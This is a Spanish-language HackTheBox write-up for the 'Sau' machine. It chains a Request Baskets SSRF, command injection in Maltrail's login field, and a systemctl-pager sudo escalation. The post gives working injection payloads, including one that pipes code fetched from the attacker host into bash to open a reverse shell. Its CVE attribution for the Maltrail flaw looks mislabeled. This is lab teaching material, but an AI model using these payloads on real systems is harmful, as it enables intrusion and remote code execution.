Post

HackTheBox - Sau

Máquina Linux de nivel Easy de HackTheBox.

Técnicas usadas: SQL Injection, SSRF, Command Injection

Fase de Reconocimiento 🧣

a. Enumeramos los puertos que están abiertos en la Máquina Sau

  • nmap -p- -sS -Pn -n <IP> -oG puertos

b. Vemos las versiones de los servicios que se están ejecutando en los puertos.

  • nmap -p<Ports> -sC <IP> -oN versiones

    Tenemos 2 puertos filtrados 80,8338

c. Visitamos la página web

  • Al buscar algo relacionado con Request Baskets veremos que existe un SSRF, esto nos servirá para ver los servicios de los puertos filtrados

Configurando SSRF 🦈

  1. Creamos un nuevo basket y lo abrimos

  2. Lo configuramos para que todo el tráfico que enviemos a este basket sea redirigido al puerto 80 interno de la máquina

  3. Si ahora visitamos el basket veremos la página web del puerto 80 (Puerto Filtrado)

d. El servicio es Maltrail (v0.53), y al buscar por vulnerabilidades encontramos CVE:2023-27163, es una inyección de comando

1
2
3
4
5
> curl 'http://<IP Sau>:55555/[basket]/login' --data 'username=;`curl http://<tun0 IP>:8081`'
--------------------------------------------------------------------------------------------------------------
> nc -lvnp 8081
listening on [any] 8081 ...
connect to [10.10.14.174] from (UNKNOWN) [10.10.11.224] 39976

c. Nos enviamos una reverse shell

1
> curl 'http://<IP Sau>:55555/08cexes/login' --data 'username=;`curl http://<tun0 IP>:4444|bash`'

Escalada de Privilegios 💹

a. Listamos privilegios a nivel de sudoers

1
2
3
4
puma@sau:/opt/maltrail$ sudo -l

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

b. Ejecutamos el script como root y una vez que el servicio se despliege teclearemos !/bin/bash

1
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service

This post is licensed under CC BY 4.0 by the author.